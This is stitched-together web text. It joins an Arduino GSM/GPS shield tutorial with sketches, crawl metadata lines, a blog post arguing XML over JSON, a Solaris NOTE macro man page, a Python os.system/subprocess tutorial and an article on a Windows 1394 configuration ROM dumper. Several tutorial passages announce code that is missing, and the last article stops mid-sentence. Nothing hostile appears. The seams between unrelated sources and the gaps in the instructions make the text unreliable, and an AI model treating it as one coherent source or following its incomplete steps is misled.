    at com.atlassian.confluence.plugin.PluginFrameworkContextListener.contextInitialized(PluginFrameworkContextListener.java:78)
    at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4853)
    at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:53...)
    ...
Caused by: com.atlassian.config.ConfigurationException: Cannot update schema
    at bucket.core.persistence.hibernate.schema.SchemaHelper.validateSchemaUpdateIfNeeded(SchemaHelper.java:174)
    at com.atlassian.confluence.upgrade.AbstractUpgradeManager.upgrade(AbstractUpgradeManager.java:120)
    ... 11 more
Caused by: org.hibernate.tool.schema.extract.spi.SchemaExtractionException: More than one table found in namespace (, ) : AUDIT_CHANGED_VALUE
    at org.hibernate.tool.schema.extract.internal.InformationExtractorJdbcDatabaseMetaDataImpl.processTableResults(InformationExtractorJdbcDatabaseMetaDataImpl.java:483)
    at org.hibernate.tool.schema.extract.internal.InformationExtractorJdbcDatabaseMetaDataImpl.getTable(InformationExtractorJdbcDatabaseMetaDataImpl.java:264)
    at org.hibernate.tool.schema.extract.internal.DatabaseInformationImpl.getTableInformation(DatabaseInformationImpl.java:111)
    at org.hibernate.tool.schema.internal.IndividuallySchemaMigratorImpl.performTablesMigration(IndividuallySchemaMigratorImpl.java:69)
    at com.atlassian.confluence.impl.hibernate.ConfluenceHibernateSchemaManagementTool$3.performTablesMigration(ConfluenceHibernateSchemaManagementTool.java:110)
    at org.hibernate.tool.schema.internal.AbstractSchemaMigrator.performMigration(AbstractSchemaMigrator.java:203)
    at org.hibernate.tool.schema.internal.AbstractSchemaMigrator.doMigration(AbstractSchemaMigrator.java:110)
    at org.hibernate.tool.hbm2ddl.SchemaUpdate.execute(SchemaUpdate.java:87)
    at org.hibernate.tool.hbm2ddl.SchemaUpdate.execute(SchemaUpdate.java:58)
    at bucket.core.persistence.hibernate.schema.SchemaHelper.validateSchemaUpdateIfNeeded(SchemaHelper.java:171)
    ... 12 more
2017-11-13 17:01:07,323 ERROR [localhost-startStop-1] [atlassian.confluence.plugin.PluginFrameworkContextListener] launchUpgrades 1 errors were encountered during upgrade:
2017-11-13 17:01:07,323 ERROR [localhost-startStop-1] [atlassian.confluence.plugin.PluginFrameworkContextListener] launchUpgrades 1: Cannot update schema

Could you help me? What should I do? If you need more information, let me know.

Thank you.
Marcus Punzelt

Hello,

Could you confirm with me which database and version you are running Confluence on? Thank you!
Kind Regards,
Shannon

Thank you, Marcus.

Confluence currently only supports Oracle 12c (release 1), and this has been the case for a while now. I would recommend that you first upgrade your instance of Oracle to 12c and then re-attempt the upgrade.

Let us know if you have any questions.

Kind Regards,
Shannon

Thanks for your reply. I will check this. It also depends on our Oracle license. Or I will migrate to SQL Server or Postgres. Thank you. I will let you know which decision I make.

Kind Regards,
Marcus

Marcus,

No worries! What might be happening now is that the database user has too many permissions. Have a look at Database Setup for Oracle - Create user with schema-creation privileges, especially the notes in that section. I would still recommend that you upgrade Oracle to a supported version, however, to avoid future issues.

Let us know if you have any questions.

Kind regards,
Shannon

Great news. Confluence works. Many thanks for your help, Shannon. I had "ANY" permissions granted, and I revoked these permissions. But in the future I will go to a supported version.

Kind regards and thanks :-),
Marcus

Marcus,

Glad to hear that worked for you! :) If you run into any issues when upgrading your database or migrating it, please feel free to raise a new question.

Take care.
https://community.atlassian.com/t5/Confluence-questions/Error-Update-from-Confluence-6-3-1-to-6-5-0-Cannot-update-schema/qaq-p/671564
CC-MAIN-2018-39
en
refinedweb
Changes for version 0.11 - 2011-05-30

- Album loading sometimes failed because certain Moose attributes were set to be required when they shouldn't have been. (HT: Riccardo Mativi)
- Migrating it to use my regular Dist::Zilla setup (mostly)
- Reorganized the project layout a little bit
- Cleaned up the code a bit
- Added calls to make_immutable to all classes, which should speed things up slightly.
- Added some more attributes to control some of the previously hardcoded bits (like Google's URL and which namespaces to map in the API).
- Added the xml_text() method to the base class to give "official" access to the internals of certain elements passed back by Google that haven't been mapped to an attribute yet.

Documentation

- picasa - master command for the Picasa Web scripts
- picasa-get - fetch albums and photos from Google Picasa Web
- picasa-list - list albums, photos, tags, or comments from Google Picasa Web

Modules

- Net::Google::PicasaWeb - use Google's Picasa Web API
- Net::Google::PicasaWeb::Album - represents a single Picasa Web photo album
- Net::Google::PicasaWeb::Base - base class
- Net::Google::PicasaWeb::Comment - represents a single Picasa Web comment
- Net::Google::PicasaWeb::Feed - base class for feed entries
- Net::Google::PicasaWeb::Media - hold information about a photo or video
- Net::Google::PicasaWeb::MediaEntry - represents a single Picasa Web photo or video
- Net::Google::PicasaWeb::MediaFeed - base class for media feed entries

Provides

- Net::Google::PicasaWeb::Media::Content in lib/Net/Google/PicasaWeb/Media.pm
- Net::Google::PicasaWeb::Media::Thumbnail in lib/Net/Google/PicasaWeb/Media.pm
- Net::Google::PicasaWeb::Tag in lib/Net/Google/PicasaWeb.pm
https://metacpan.org/release/HANENKAMP/Net-Google-PicasaWeb-0.11
CC-MAIN-2018-39
en
refinedweb
Technique to Create Dialogs from Images

This article describes a technique for creating dialogs with any form you want for them. In order to define the form of the dialog you only have to create a bitmap with your usual graphics program (say Photoshop or Microsoft Paint, ...). In this bitmap you have to paint the form of your dialog using as many colors as you want (it can be RGB or paletted!), but remember to choose one color to be interpreted as the only transparent (or only opaque) color. It can be any color you want, but you have to know its RGB components, because they will be one of the parameters to pass to the BitmapRegion() function, which does all the hard work for you! The other arguments of this function are the bitmap handle, and a boolean argument which tells the function to consider the passed color as transparent or opaque! What this function returns is a handle to a region object "hRegion", which can, and should, be passed to the member function of CWnd: SetWindowRgn(hRegion), in order to complete the definition of the form of the dialog.

Sample 1

// hBitmap is the handle to the loaded bitmap
// Here, the transparent color is black. All other colors
// in the bitmap will be considered opaque
hRegion=BitmapRegion(hBitmap,RGB(0,0,0));
if(hRegion)
    SetWindowRgn(hRegion,TRUE);  // TRUE=repaint the window!

Sample 2:

// hBitmap is the handle to the loaded bitmap
// Here, the opaque color is yellow. All other colors in
// the bitmap will be considered transparent
// The last argument tells the function to interpret the
// passed color as opaque. If this argument is not present,
// the color is the transparent color!
hRegion=BitmapRegion(hBitmap,RGB(255,255,0),FALSE);
if(hRegion)
    SetWindowRgn(hRegion,TRUE);  // TRUE=repaint the window!

This technique provides two ways of using the mentioned function. One way is to use it for defining the clipping region for the dialog, as explained in the previous code. This function should be called from the OnCreate() message handler of the dialog, where the bitmap has to be loaded (further explanation below!). With this option the background of the dialog has the plain color of all the dialogs in the system. That is, the dialog has a special boundary form, but it has the same color and appearance as all standard dialogs. You can place the controls with the Resource Editor and work with them exactly like you would do with a normal dialog. You only have to pay attention to the position of the controls, because they have to be placed on the opaque areas of the bitmap in order to be visible!

The other way to use this technique is to get a completely owner-drawn dialog. Not only the boundaries of the dialog are computed from the bitmap, but also the background image of the dialog! This option needs a bit more code to get done, but it isn't complicated and the effect is really cool (you can use this for the About... dialog of your application!). With this option the background is filled with the bitmap. The controls (if you put some on the dialog) are drawn over the bitmap, so if you want them not to appear, put them on transparent areas of the dialog, or simply put them away! In the sample project, I use this option with a dialog in which I let no control be shown (in fact there remains only an "Ok" button!) and therefore I have to be able to close the dialog in another manner.
The solution is to catch the clicking of the user over a special area of the bitmap. I painted a yellow cross on the bitmap and noted the coordinates in pixels of the bounding rectangle of the cross. When the user clicks within this area, the dialog is closed with EndDialog(). In order to compare the coordinates of the pointer with those of the mentioned area, the dialog has to have no caption or title bar, and it has to have no border! (Study the sample project for a closer explanation.)

Another feature implemented in this sample project, for the dialog with the bitmap painted on the background, is that the user can drag the dialog by clicking anywhere on it (except on the yellow cross, which closes the dialog!). In order to achieve this effect, you have to override the OnNcHitTest() message handler of the dialog and return HTCAPTION every time the user doesn't click on the yellow cross. In that case you return HTCLIENT, in order to let the system send the WM_LBUTTONDOWN message to the dialog!

In either case (whether you want your bitmap to be painted on the background or not) you have to insert the following line in the .cpp file of your dialog implementation:

#include "AnyForm.h"

You have to include the files AnyForm.h and AnyForm.cpp in your project, in order to get things working!

Explanation 1: The bitmap is used only to compute the clipping region of the dialog

This option is shown in the previous photo called "Without". In this case the code is rather simple. You have to override the OnCreate() message handler of the dialog, and insert a few lines of code, in order to obtain something like this:

int CMyDlgWithout::OnCreate(LPCREATESTRUCT lpCreateStruct)
{
    if (CDialog::OnCreate(lpCreateStruct) == -1)
        return -1;

    // In this case, we don't need to store the loaded bitmap
    // for later use, because we don't put it on the background.
    // We use it only to compute the clipping region and after
    // the region is set on the window, we can free the loaded
    // bitmap. That's the reason why in this case there is no
    // need of member variables, memory contexts, ...
    HBITMAP hBmp;
    HRGN hRegion;

    // The name of the bitmap to load (if not in the same
    // directory as the application, provide full path!)
    // If the bitmap is to be loaded from the resources, the name
    // stands for the resource-string identification
    char *name="BitmapWithout.bmp";  // (file name truncated in this copy; ".bmp" assumed)
    // (The loading and region calls below were lost in this copy and are
    // reconstructed from Sample 1 above.)
    hBmp=(HBITMAP)LoadImage(NULL,name,IMAGE_BITMAP,0,0,LR_LOADFROMFILE);

    //
    // A sample where the red color is interpreted as the
    // opaque color...
    //
    // hRegion=BitmapRegion(hBmp,RGB(255,0,0),FALSE);
    //
    hRegion=BitmapRegion(hBmp,RGB(0,0,0));
    if(hRegion)
        SetWindowRgn(hRegion,TRUE);

    // After this, because in this case we don't need to store
    // the bitmap anymore, we can free the resources used by
    // it. We also don't need here to select the bitmap on the
    // memory context. In fact, we don't need any memory
    // context!!! So:

    // Delete the bitmap that we loaded at the beginning
    if(hBmp)
        DeleteObject(hBmp);

    // And in this case, that's all folks!!!
    return 0;
}

Explanation 2: The bitmap is used to compute the clipping region of the dialog, and to be painted on the background of the dialog

This option is shown in the previous photo called "With". This case is a little more complicated, but it can be better understood through the code of the sample project. At first, you have to insert a few member variables in the dialog class that controls your dialog. The class definition would look similar to this:

class CMyDlgWith : public CDialog
{
    ...
    // Implementation
    protected:
        HBITMAP hBmp;
        HBITMAP hPrevBmp;
        HDC hMemDC;
        HRGN hRegion;
        BITMAP bmInfo;
    ...
};

You have to override the message handlers for the following messages: WM_CREATE, WM_DESTROY and WM_ERASEBKGND. The code for these functions would look like this:

int CMyDlgWith::OnCreate(LPCREATESTRUCT lpCreateStruct)
{
    if (CDialog::OnCreate(lpCreateStruct) == -1)
        return -1;

    // The name of the bitmap to load (if not in the same
    // directory as the application, provide full path!)
    // If the bitmap is to be loaded from the resources,
    // the name stands for the resource-string identification
    char *name="BitmapWith.bmp";  // (file name truncated in this copy; ".bmp" assumed)
    // (The loading call below was lost in this copy and is reconstructed
    // to match the samples earlier in the article.)
    hBmp=(HBITMAP)LoadImage(NULL,name,IMAGE_BITMAP,0,0,LR_LOADFROMFILE);

    // We ask the bitmap for its size...
    GetObject(hBmp,sizeof(bmInfo),&bmInfo);

    // At last, we create a display-compatible memory context!
    hMemDC=CreateCompatibleDC(NULL);
    hPrevBmp=(HBITMAP)SelectObject(hMemDC,hBmp);
    return 0;
}

void CMyDlgWith::OnDestroy()
{
    CDialog::OnDestroy();

    // Simply select the previous bitmap on the memory context...
    SelectObject(hMemDC,hPrevBmp);

    // ... and delete the bitmap that we loaded at the beginning
    if(hBmp)
        DeleteObject(hBmp);
}

BOOL CMyDlgWith::OnEraseBkgnd(CDC* pDC)
{
    // If you only want a dialog with a special border form,
    // but you don't want a bitmap to be drawn on its background
    // surface, then comment the next two lines, and uncomment
    // the last line in this function!
    BitBlt(pDC->m_hDC, 0, 0, bmInfo.bmWidth, bmInfo.bmHeight, hMemDC, 0, 0, SRCCOPY);
    return FALSE;

    // return CDialog::OnEraseBkgnd(pDC);
}

The last thing to do is to provide the dialog a way to get closed by the user. As I mentioned before, the best thing is to draw a special figure anywhere on the bitmap and to catch the clicking of the mouse in this area, by catching the WM_LBUTTONDOWN message of the dialog. Another feature can be easily implemented: permit 'click and drag' of the dialog by clicking anywhere on it! This can be achieved by catching the WM_NCHITTEST message. The following code shows how this is implemented:

void CMyDlgWith::OnLButtonDown(UINT nFlags, CPoint point)
{
    // If the user clicks on the 'x'-mark we close the dialog!
    // The coordinates of the rectangle around the 'x'-mark
    // are in pixels and client coordinates!
    // That's the reason why the dialog resource has to have
    // no border and no caption bar.
    if(point.x>333 && point.x<354 && point.y>54 && point.y<77)
        EndDialog(0);

    CDialog::OnLButtonDown(nFlags, point);
}

UINT CMyDlgWith::OnNcHitTest(CPoint point)
{
    ScreenToClient(&point);

    // Because "point" is passed in screen coordinates
    // (Windows knows why?!) we have to convert it to client
    // coordinates, in order to compare it with the bounding
    // rectangle around the 'x'-mark. If the point lies within,
    // then we return a hit on a control or some other client
    // area (so that the OnLButtonDown message can be sent, and
    // afterwards close the dialog!), but in all other cases,
    // we return the information as if the user always would
    // have clicked on the caption bar. This permits the user
    // to drag and move the dialog by clicking anywhere on it
    // except the rectangle we consider here!
    if(point.x>333 && point.x<354 && point.y>54 && point.y<77)
        return HTCLIENT;
    else
        return HTCAPTION;
}

Demo project

The demo project shows the two ways of using this technique. The source code has comments in order to explain it better.

Source code

The source code comprises only the two following files, which you have to include in your project: AnyForm.h and AnyForm.cpp.

Downloads
Download source - 4 Kb
Download demo project - 115 Kb
https://www.codeguru.com/cpp/w-d/dislog/bitmapsimages/article.php/c5055/Technique-to-Create-Dialogs-from-Images.htm
CC-MAIN-2018-39
en
refinedweb
using components.xml to schedule Quartz job in cluster

System Administrator - Mar 20, 2008 5:44 PM

The scheduling using the EJB3 timer service or Quartz for jobs is working fine for an interval-based timer (use case is to query AD every x seconds/minutes and cache the data in an instance variable). The question is what happens when I use the following in components.xml to schedule/create a job when the app is deployed in a clustered JBoss environment? I do not have access to a JBoss cluster but we will be deploying to a prod 2-node cluster. My concern is that the job will be created twice (or n times per n nodes in the cluster). By default, Quartz uses in-memory storage. For clustered mode, it is required to use JDBCJobStore for Quartz. EJB timer does not support clusters. Any tips would be appreciated. thx.

<event type="org.jboss.seam.postInitialization">
    <action execute="#{controller.scheduleTimer}"/>
</event>

<!-- Install the QuartzDispatcher -->
<async:quartz-dispatcher/>

controller POJO:

@Name("controller")
@AutoCreate
public class ScheduleController {
    @In ScheduleProcessor processor;
    @Logger Log log;

    private Map<String,List<UserItem>> map;
    private String distinguishedNameShims;
    private String distinguishedNameItJava;
    private Timer timer;
    private QuartzTriggerHandle quartzTriggerHandle;

    //test method from button in JSF
    public void scheduleTimer() {
        ...
    }
}

application-scoped POJO:

@Name("processor")
@AutoCreate
@Scope(ScopeType.APPLICATION)
public class ScheduleProcessor {
    ...
}

1. Re: using components.xml to schedule Quartz job in cluster
Marcus Popetz - Mar 21, 2008 4:19 PM (in response to System Administrator)

We handle this manually in our 12-node cluster, i.e.: each node has a servername passed in at startup via the -D flag, and then we use that name plus the name of the task to query the database to see if the job should be running on that node. It would be nice if there were a built-in way to handle this, but I haven't seen one yet. Some code to illustrate in case my description wasn't clear. The SiteGlobal entity is a name/value pair we store in the db for config.

SiteGlobal globalValue = SiteGlobal.retrieveByName(discussionSession,
        (serverName==null?"":serverName+ ".QUARTZ_ENABLED"));
if(globalValue==null) {
    System.out.println("Quartz not approved in the SiteGlobal table to run: siteGlobal: "
            +serverName+ ".QUARTZ_ENABLED");
    enabled = false;
} else {
    enabled = globalValue.getValue().equalsIgnoreCase("ON");
}
if (enabled) {
    apacheLogFollower.lookForNewData(5000L, 60000L);

2. Re: using components.xml to schedule Quartz job in cluster
Marius Oancea - Mar 13, 2009 11:11 AM (in response to System Administrator)

I think this is not the idea of clustering. All the nodes have to have the chance to run the job. I have a similar architecture:

@Observer("org.jboss.seam.postInitialization")
public String callScheduler() {
    ...
    QuartzTriggerHandle handleHour = processor.scheduleCollector(new Date(), "0 0/30 * * * ?");
}

and:

@Asynchronous
@Transactional
public QuartzTriggerHandle scheduleCollector (@Expiration Date when, @IntervalCron String cron) {
    // do something at the scheduled time
}

My seam.quartz.properties is:

#============================================================================
# Configure Main Scheduler Properties
#============================================================================
org.quartz.scheduler.instanceName = DefaultQuartzScheduler
org.quartz.scheduler.instanceId = AUTO
org.quartz.scheduler.rmi.export = false
org.quartz.scheduler.rmi.proxy = false
org.quartz.scheduler.wrapJobExecutionInUserTransaction = false

#============================================================================
# Configure ThreadPool
#============================================================================
org.quartz.threadPool.class = org.quartz.simpl.SimpleThreadPool
org.quartz.threadPool.threadCount = 10
org.quartz.threadPool.threadPriority = 5
org.quartz.threadPool.threadsInheritContextClassLoaderOfInitializingThread = true

#============================================================================
# Configure JobStore
#============================================================================
org.quartz.jobStore.misfireThreshold = 60000
org.quartz.jobStore.isClustered = true
org.quartz.jobStore.clusterCheckinInterval = 15000
org.quartz.jobStore.class = org.quartz.impl.jdbcjobstore.JobStoreTX
org.quartz.jobStore.driverDelegateClass = org.quartz.impl.jdbcjobstore.DB2v8Delegate
org.quartz.jobStore.dataSource = QUARTZ
org.quartz.jobStore.nonManagedTXDataSource = QUARTZ_NO_TX
org.quartz.jobStore.tablePrefix = QRTZ_
org.quartz.jobStore.selectWithLockSQL=SELECT * FROM {0}LOCKS UPDLOCK WHERE LOCK_NAME = ? FOR UPDATE

org.quartz.dataSource.QUARTZ.jndiURL = java:/emailcollectorDatasource
org.quartz.dataSource.QUARTZ_NO_TX.jndiURL = java:/emailcollectorDatasource

There is no classpath problem on Seam 2.1.1, but the jobs are executed on all the nodes of the cluster. Any idea why?

3. Re: using components.xml to schedule Quartz job in cluster
Nikolay Elenkov - Mar 13, 2009 12:38 PM (in response to System Administrator)

Marius Oancea wrote on Mar 13, 2009 11:11:

@Observer("org.jboss.seam.postInitialization")
public String callScheduler() {
    ...
    QuartzTriggerHandle handleHour = processor.scheduleCollector(new Date(), "0 0/30 * * * ?");
}

There is no classpath problem on Seam 2.1.1, but the jobs are executed on all the nodes of the cluster. Any idea why?

'postInitialization' is raised for each app instance (at each node), so your job is probably scheduled multiple times. You will have to add some code to check if the job is already scheduled and skip scheduleCollector() if it is. You will have to use the Quartz API for that (Scheduler, Trigger and friends). Btw, I recommend using the Quartz API directly for scheduling as well, especially since you are running in a cluster. QuartzTriggerHandle is practically useless: there is no way to get the job/trigger name, you get automatically generated names (UIDs) that make debugging/support quite hard, etc. In short, the native Quartz API is way more flexible. Seam Quartz wrappers work well for one-shot jobs (async methods and stuff) but for anything more than that you are better off with native Quartz.
https://developer.jboss.org/message/665262?tstart=0
CC-MAIN-2018-39
en
refinedweb
[SOLVED] stdlib: No such file or directory
Hello, I'm new to Qt. I'm trying to build the Android documentation example "Creating a Mobile Application", but the build fails with:
stdlib: No such file or directory
 #include <stdlib.h>
           ^
/home/myuser/android-ndk/sources/cxx-stl/gnu-libstdc++/4.9/include/cstdlib
I'm using:
- Debian 64 bits
- SDK
- NDK 64 bits
- Qt Creator 3.2.1
Thanks in advance!
- sierdzio Moderators
Use this instead:
@
#include <cstdlib>
@
Thanks! But I had already tried your suggestion... After searching and researching on the web, I found a solution in another post.
https://forum.qt.io/topic/46691/solved-stdlib-no-such-file-or-directory
CC-MAIN-2018-39
en
refinedweb
The Event class contains all Particles produced in the generation of an event. More...
#include <Event.h>
The Event class contains all Particles produced in the generation of an event. The particles are divided into Collisions corresponding to the actual collisions between incoming particles in a bunch crossing. Event inherits from Named, which holds the name of an event.
Definition at line 36 of file Event.h.
Map colour lines to indices.
Definition at line 48 of file Event.h.
The standard constructor for an Event takes as arguments a pair of colliding particles (corresponding to the primary collision in case of multiple collisions in an event). Optionally a pointer to the EventHandler which performed the generation, an event name and event number can be given (defaults: tcEventBasePtr(), "", -1, with an event weight of 1.0).
Add a new Step to this Collision. For book keeping purposes only. The steps are accessed from the different Collisions in this Event.
Definition at line 298 of file Event.h.
References allSteps, Init(), persistentInput(), persistentOutput(), rebind(), and removeEntry().
Add a new SubProcess to this Event. For book keeping purposes only. The sub-processes are accessed from the different Collisions in this Event.
Definition at line 284 of file Event.h.
References allSubProcesses.
Returns a full clone of this Event. All collisions, Particles etc. in this Event are cloned.
Print out debugging information for this object on std::cerr. To be called from within a debugger via the debug() function.
Reimplemented from ThePEG::Base.
Extract all final state particles in this Event.
Definition at line 121 of file Event.h.
References ThePEG::inserter(), and selectFinalState().
Definition at line 129 of file Event.h.
References selectFinalState().
Return a pointer to the EventHandler which produced this Event. May be the null pointer.
Definition at line 90 of file Event.h.
References select(), and theHandler.
Standard Init function.
Referenced by addStep().
Create a new Step in the current Collision, which is a copy of the last Step (if any) and return a pointer to it. If no collision exists, one will be added.
Referenced by incoming().
Return the number assigned to this Event. The name is accessed with the name() method of the Named base class.
Definition at line 183 of file Event.h.
References cleanSteps(), colourLineIndex(), removeDecay(), removeParticle(), and theNumber.
Return an optional named weight associated to this event. Returns 0, if no weight identified by this name is present.
Referenced by weight().
Return a pointer to the primary Collision in this Event.
Definition at line 139 of file Event.h.
References collisions().
Referenced by optionalWeights(), primarySubProcess(), and select().
Return a pointer to the primary SubProcess in the primary Collision in this Event.
Definition at line 457 of file Event.h.
References collisions(), and primaryCollision().
Referenced by collisions().
Rebind to cloned objects. When an Event is cloned, a shallow copy is done first, then all Particles etc. are cloned, and finally this method is used to see to that the pointers in the cloned Event point to the cloned Particles etc.
Remove the given Particle from the Collision. If this was the last daughter of the mother Particle, the latter is added to the list of final state particles.
Referenced by number().
Extract particles from this event which satisfy the requirements given by an object of the SelectorBase class.
Definition at line 464 of file Event.h.
References ThePEG::SelectorBase::allCollisions(), primaryCollision(), and theCollisions. Referenced by handler(), and selectFinalState(). Definition at line 111 of file Event.h. References select(). Referenced by getFinalState(). Most of the Event classes are friends with each other. Definition at line 45 of file Event.h.
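A usage sketch of the selection interface documented above; the header path and pointer typedefs (tPVector, tCollPtr, tSubProPtr) follow ThePEG's usual conventions and inspect() is a made-up function:
#include "ThePEG/EventRecord/Event.h"

using namespace ThePEG;

void inspect(const Event & event) {
    // All final-state particles, via the getFinalState()/selectFinalState() pair.
    tPVector finals = event.getFinalState();
    // The primary Collision, and through it the primary SubProcess.
    tCollPtr coll = event.primaryCollision();
    tSubProPtr sub = event.primarySubProcess();
}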
https://thepeg.hepforge.org/doxygen/classThePEG_1_1Event.html
CC-MAIN-2018-39
en
refinedweb
1 + sin(3)
1.1411200080598671
500x500 Float64 Array:
162.603 127.476 125.076 118.914 … 121.913 119.346 123.416 118.659
127.476 173.211 132.191 125.419 131.765 126.816 131.182 126.373
125.076 132.191 165.643 122.073 123.358 119.285 127.365 127.132
118.914 125.419 122.073 161.962 124.197 116.947 125.176 119.248
119.912 127.888 125.779 119.243 124.572 120.879 124.785 123.494
113.774 118.241 121.404 118.418 … 121.256 118.652 120.242 117.505
125.258 128.183 125.683 123.607 122.044 120.701 127.675 123.064
123.856 128.797 127.62 126.731 125.854 121.413 130.059 129.455
119.448 123.88 122.982 117.524 119.345 119.598 121.751 120.35
121.084 132.255 125.685 126.087 125.765 122.052 134.187 124.131
⋮ ⋱
122.913 126.649 124.402 122.839 … 128.841 119.598 131.985 119.851
119.279 120.223 119.79 118.196 121.333 116.689 121.644 117.713
115.047 121.647 119.567 119.708 120.483 116.044 124.468 116.12
118.465 127.593 120.366 116.033 116.425 115.412 123.313 120.278
121.567 127.576 123.69 118.96 119.438 116.865 125.093 116.793
122.765 127.004 123.946 119.973 … 122.286 121.177 126.788 124.31
121.913 131.765 123.358 124.197 168.014 122.242 128.991 122.263
119.346 126.816 119.285 116.947 122.242 161.424 123.398 119.624
123.416 131.182 127.365 125.176 128.991 123.398 173.575 128.892
118.659 126.373 127.132 119.248 122.263 119.624 128.892 161.5
We can define functions, of course, and use them in later input cells:
f(x) = x + 1
# methods for generic function f
f(x) at In[6]:1
println(f(3))
f([1,1,2,3,5,8])
Hello from C!!
4
6-element Int64 Array:
 2
 2
 3
 4
 6
 9
f("Hello, world?")
no method +(ASCIIString,Int64)
at In[8]:1
in f at In[6]:1
PyObject <matplotlib.text.Text object at 0x1190c7b50>
Notice that, by default, the plots are displayed inline (just as for the %pylab inline "magic" in IPython). This kind of multimedia display can be enabled for any Julia object, as explained in the next section.
Like most programming languages, Julia has a built-in print(x) function for outputting an object x as text, and you can override the resulting text representation of a user-defined type by overloading Julia's show function. The next version of Julia, however, will extend this to a more general mechanism to display arbitrary multimedia representations of objects, as defined by standard MIME types. More specifically, the Julia multimedia I/O API provides:
- The display(x) function, which requests the richest available multimedia display of a Julia object x (with a text/plain fallback).
- writemime, which allows one to indicate arbitrary multimedia representations (keyed by standard MIME types) of user-defined types.
- Pluggable display backends, defined via the Display type. IJulia provides one such backend which, thanks to the IPython notebook, is capable of displaying HTML, LaTeX, SVG, PNG, and JPEG media formats.
The last two points are critical, because they separate multimedia export (which is defined by functions associated with the originating Julia data) from multimedia display (defined by backends which know nothing about the source of the data). Precisely these mechanisms were used to create the inline PyPlot plots above.
To start with, the simplest thing is to provide the MIME type of the data when you call display, which allows you to pass "raw" data in the corresponding format:
display("text/html", """Hello <b>world</b> in <font color="red">HTML</font>!""")
However, it will be more common to attach this information to types, so that they display correctly automatically. For example, let's define a simple HTML type in Julia that contains a string and automatically displays as HTML (given an HTML-capable backend such as IJulia):
For example, let's define a simple HTML type in Julia that contains a string and automatically displays as HTML (given an HTML-capable backend such as IJulia): type HTML s::String end import Base.writemime writemime(io::IO, ::@MIME("text/html"), x::HTML) = print(io, x.s) # methods for generic function writemime writemime(io,::MIME{:text/plain},x) at multimedia.jl:31 writemime(io,m::String,x) at multimedia.jl:37 writemime(io::IO,m::MIME{:image/eps},f::PyPlotFigure) at /Users/stevenj/.julia/PyPlot/src/PyPlot.jl:67 writemime(io::IO,m::MIME{:application/pdf},f::PyPlotFigure) at /Users/stevenj/.julia/PyPlot/src/PyPlot.jl:67 writemime(io::IO,m::MIME{:image/png},f::PyPlotFigure) at /Users/stevenj/.julia/PyPlot/src/PyPlot.jl:67 ... 4 methods not shown (use methods(writemime) to see them all) Here, writemime is just a function that writes x in the corresponding format ( text/html) to the I/O stream io. The @MIME is a bit of magic to allow Julia's multiple dispatch to automatically select the correct writemime function for a given MIME type (here "text/html") and object type (here HTML). We also needed an import statement in order to add new methods to an existing function from another module. This writemime definition is all that we need to make any object of type HTML display automatically as HTML text in IJulia: x = HTML("<ul> <li> Hello from a bulleted list! </ul>") display(x) println(x) HTML("<ul> <li> Hello from a bulleted list! </ul>") Once this functionality becomes available in a Julia release, we expect that many Julia modules will provide rich representations of their objects for display in IJulia, and moreover that other backends will appear. Not only can other backends (such as Tim Holy's ImageView package) provide more full-featured display of images etcetera than IJulia's inline graphics, but they can also add support for displaying MIME types not handled by the IPython notebook (such as video or audio).
http://nbviewer.jupyter.org/url/jdj.mit.edu/~stevenj/IJulia%20Preview.ipynb
CC-MAIN-2018-39
en
refinedweb
NAME
Tk_GetUid, Tk_Uid - convert from string to unique identifier

SYNOPSIS
#include <tk.h>

typedef char *Tk_Uid;

Tk_Uid
Tk_GetUid(string)

ARGUMENTS
string    String for which the corresponding unique identifier is desired.

DESCRIPTION
Tk_GetUid returns the unique identifier corresponding to string. Unique identifiers are similar to atoms in Lisp, and are used in Tk to speed up comparisons and searches. A unique identifier (type Tk_Uid) is a string pointer and may be used anywhere that a variable of type ``char *'' could be used. However, there is guaranteed to be exactly one unique identifier for any given string value. If Tk_GetUid is called twice, once with string a and once with string b, and if a and b have the same string value (strcmp(a, b) == 0), then Tk_GetUid will return exactly the same Tk_Uid value for each call (Tk_GetUid(a) == Tk_GetUid(b)). This means that variables of type Tk_Uid may be compared directly (x == y) without having to call strcmp. In addition, the return value from Tk_GetUid will have the same string value as its argument (strcmp(Tk_GetUid(a), a) == 0).

KEYWORDS
atom, unique identifier
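A short C sketch of the pointer-equality property described above (the surrounding function is just scaffolding):
#include <tk.h>

void example(void)
{
    Tk_Uid a = Tk_GetUid("button");
    Tk_Uid b = Tk_GetUid("button");

    /* Equal strings intern to the same pointer, so == replaces strcmp(). */
    if (a == b) {
        /* always taken: both point at the same interned string */
    }
}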
http://search.cpan.org/dist/Tk/pod/pTk/GetUid.pod
CC-MAIN-2016-30
en
refinedweb
The new GSM/GPS shield for Arduino (from here on, simply the shield) has several new hardware features that allow maximum customization and provide many configurations. We begin with the supply circuit: a simple LM7805. To work, it needs an input voltage between 7.5 V and 12 V. As shown in the circuit diagram, the input voltage, after being stabilized at 5 V, is reduced to 4.3 V by a diode to power the modules, which need a voltage between 3.2 and 4.8 V. During operations such as the use of GPRS, the module draws a current of about 1 A, so the power source must be able to supply this current. An important technical feature is the serial adapter for the communication between the GSM module and Arduino. To step the voltage down, a simple voltage divider is used, while to step it up from the GSM module to Arduino we chose a BS170 MOSFET. The feature that is immediately evident is the presence of two audio jacks. With a microphone and a headset with a 3.5 mm jack (just standard computer headphones), you can make a voice call!! To preserve compatibility with the Arduino Mega, we changed the selection method for the serial communication. The two serial communication modes (hardware or software) are selectable by jumper, leaving the user the choice between the two configurations (for software serial, this new version uses pins 2 and 3), or you can use pins of your choice with a simple wire connection. With this solution you can use the Arduino Mega through two of its four serials, or carry out the communication via a software serial on two pins of your choice. Also to preserve maximum flexibility and customization, there are some pins on the back of the PCB which allow connections between the Arduino digital ports and the data-flow control signals (CTS, RTS) or alerts for incoming calls or unread SMS (RI). In this new version, you can disable these connections to save input or output pins. Comparing the new board with the previous one, you can see the presence of two connectors on the top. These additional connections allow the shield to be used also with the new small breakouts for the SIM900 and SIM908. The new Simcom SIM908 module is characterized by the presence of a 42-channel GPS. The scenario opened up by this new SIMCOM module, in addition to the GSM/GPRS shield, is quite remarkable: the creation of a GPS tracking device that can communicate its location via the Internet (or SMS) is now available to everyone, avoiding all the problems of assembly and low-level programming. A further feature of this new version concerns the presence of a supercap for the circuit dedicated to the RTC (Real Time Clock). Inside the SIM900, as well as the SIM908, there is a circuit that is responsible for updating the clock even without power.
GSM GPS SHIELD SCHEMATICS
[CODE]
R1: 10 kohm
R2: 10 kohm
R3: 10 kohm
